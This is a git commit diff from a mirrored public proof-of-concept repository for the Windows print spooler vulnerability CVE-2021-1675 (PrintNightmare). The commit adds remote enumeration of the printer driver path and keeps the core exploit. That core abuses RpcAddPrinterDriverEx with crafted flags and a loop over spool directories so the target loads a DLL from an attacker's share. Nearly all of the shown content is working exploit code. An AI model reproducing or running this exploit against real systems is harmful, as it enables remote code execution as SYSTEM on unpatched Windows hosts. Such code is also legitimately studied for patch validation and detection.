r3pek/CVE-2021-1675
1
0
Fork 0
mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2024-12-22 10:46:32 +00:00
Code Releases Activity

Added dynamic pDriverPath, remember to update impacket

Browse source 
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
This commit is contained in:
cube0x0 2021-06-30 16:12:24 +02:00
parent 2f4b1def94
commit 3bad3016ac
2 changed files with 55 additions and 8 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

61
CVE-2021-1675.py
View file

@ -2,9 +2,34 @@
from impacket.dcerpc.v5 import rprn from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5.dtypes import NULL
from impacket.structure import Structure
import argparse import argparse
import sys import sys
import time import time
import pathlib
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
class DRIVER_INFO_2_BLOB(Structure):
structure = (
('cVersion','<L'),
('NameOffset', '<L'),
('EnvironmentOffset', '<L'),
('DriverPathOffset', '<L'),
('DataFileOffset', '<L'),
('ConfigFileOffset', '<L'),
)
def __init__(self, data = None):
Structure.__init__(self, data = data)
def fromString(self,data):
Structure.fromString(self, data)
self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']:self['DataFileOffset']].decode('utf-16-le')
self['DataFileArray'] = self.rawData[self['DataFileOffset']:self['DriverPathOffset']].decode('utf-16-le')
self['DriverPathArray'] = self.rawData[self['DriverPathOffset']:self['EnvironmentOffset']].decode('utf-16-le')
self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']:self['NameOffset']].decode('utf-16-le')
self['NameArray'] = self.rawData[self['NameOffset']:len(self.rawData)].decode('utf-16-le')
def connect(username, password, domain, lmhash, nthash, address, port): def connect(username, password, domain, lmhash, nthash, address, port):
binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address) binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
@ -29,9 +54,35 @@ def connect(username, password, domain, lmhash, nthash, address, port):
return dce return dce
def getDrivers(dce, handle=NULL):
#get drivers
resp = rprn.hRpcEnumPrinterDrivers(dce, pName=handle, pEnvironment="Windows x64\x00", Level=2)
data = b''.join(resp['pDrivers'])
#parse drivers
blob = DRIVER_INFO_2_BLOB()
blob.fromString(data)
#blob.dump()
return blob
def main(username, password, domain, lmhash, nthash, address, port, share): def main(username, password, domain, lmhash, nthash, address, port, share):
#connect #connect
dce = connect(username, password, domain, lmhash, nthash, address, port) dce = connect(username, password, domain, lmhash, nthash, address, port)
#handle = "\\\\{0}\x00".format(address)
handle = NULL
#find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
try:
blob = getDrivers(dce, handle)
pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
except Exception as e:
print('[-] Failed to enumerate remote pDriverPath')
print(str(e))
sys.exit(1)
print("[+] pDriverPath Found {0}".format(pDriverPath))
#build DRIVER_CONTAINER package #build DRIVER_CONTAINER package
container_info = rprn.DRIVER_CONTAINER() container_info = rprn.DRIVER_CONTAINER()
@ -40,21 +91,17 @@ def main(username, password, domain, lmhash, nthash, address, port, share):
container_info['DriverInfo']['Level2']['cVersion'] = 3 container_info['DriverInfo']['Level2']['cVersion'] = 3
container_info['DriverInfo']['Level2']['pName'] = "1234\x00" container_info['DriverInfo']['Level2']['pName'] = "1234\x00"
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
container_info['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00" container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00'
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000 flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
#handle = "\\\\{0}\x00".format(address)
handle = NULL
filename = share.split("\\")[-1] filename = share.split("\\")[-1]
print("[*] Executing {0}".format(share))
print("[*] Uploading {0}".format(share))
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage0: {0}".format(resp['ErrorCode'])) print("[*] Stage0: {0}".format(resp['ErrorCode']))
for i in range(1, 50): for i in range(1, 30):
try: try:
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)

BIN
Images/poc.png
View file

Binary file not shown.
Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 363 KiB

After

Width:  |  Height:  |  Size: 196 KiB